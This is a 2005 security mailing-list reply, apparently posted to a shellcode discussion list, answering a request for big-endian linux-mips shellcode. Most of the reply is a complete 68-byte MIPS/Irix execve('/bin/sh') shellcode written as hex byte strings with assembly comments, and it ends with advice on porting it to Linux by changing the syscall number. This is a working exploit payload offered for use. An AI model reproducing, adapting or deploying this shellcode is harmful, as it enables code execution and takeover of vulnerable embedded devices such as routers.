You could base it off of this. Looks big-endian to me, based on my
somewhat limited knowledge of MIPS architecture.
/* 68 byte MIPS/Irix PIC execve shellcode. -scut/teso */
"\xaf\xa0\xff\xfc" /* sw $zero, -4
($sp) */
"\x24\x06\x73\x50" /* li $a2,
0x7350 */
"\x04\xd0\xff\xff" /* bltzal $a2,
dpatch */
"\x8f\xa6\xff\xfc" /* lw $a2, -4
($sp) */
/* a2 = (char **) envp = NULL */
"\x24\x0f\xff\xcb" /* li $t7,
-53 */
"\x01\xe0\x78\x27" /* nor $t7, $t7,
$zero */
"\x03\xef\xf8\x21" /* addu $ra, $ra,
$t7 */
/* a0 = (char *) pathname */
"\x23\xe4\xff\xf8" /* addi $a0, $ra,
-8 */
/* fix 0x42 dummy byte in pathname to shell */
"\x8f\xed\xff\xfc" /* lw $t5, -4
($ra) */
"\x25\xad\xff\xbe" /* addiu $t5, $t5,
-66 */
"\xaf\xed\xff\xfc" /* sw $t5, -4
($ra) */
/* a1 = (char **) argv */
"\xaf\xa4\xff\xf8" /* sw $a0, -8
($sp) */
"\x27\xa5\xff\xf8" /* addiu $a1, $sp,
-8 */
"\x24\x02\x04\x23" /* li $v0, 1059
(SYS_execve) */
"\x01\x01\x01\x0c" /*
syscall */
"\x2f\x62\x69\x6e" /* .ascii "/
bin" */
"\x2f\x73\x68\x42" /* .ascii "/sh", .byte
0xdummy */
If you compiled a C program like this for linux-mips:
int main()
{
execve("/bin/sh",NULL,NULL);
}
You should be able to see what's going on.
I'd imagine that linux syscall wants you to put arguments in $a0,
$a1, etc, and syscall number in $v0. This is how the MIPS calling
conventions are, I think, so I would imagine linux respects them. It
might be as simple as changing the syscall number.
On Dec 15, 2005, at 6:04 PM, Roman Medina-Heigl Hernandez wrote:
> Hi,
>
> Does somebody have shellcode for linux-mips (MSB)?
>
> I found this for LSB (Little Endian) Cobalt:
> http://www.milw0rm.com/id.php?id=1306
>
> I'd like to play with Broadcom chipset and MSB (Big Endian)...
>
> --
>
> Saludos,
> -Roman
>
> PGP Fingerprint:
> 09BB EFCD 21ED 4E79 25FB 29E1 E47F 8A7D EAD5 6742
> [Key ID: 0xEAD56742. Available at KeyServ]
Received on Dec 17 2005
Intro
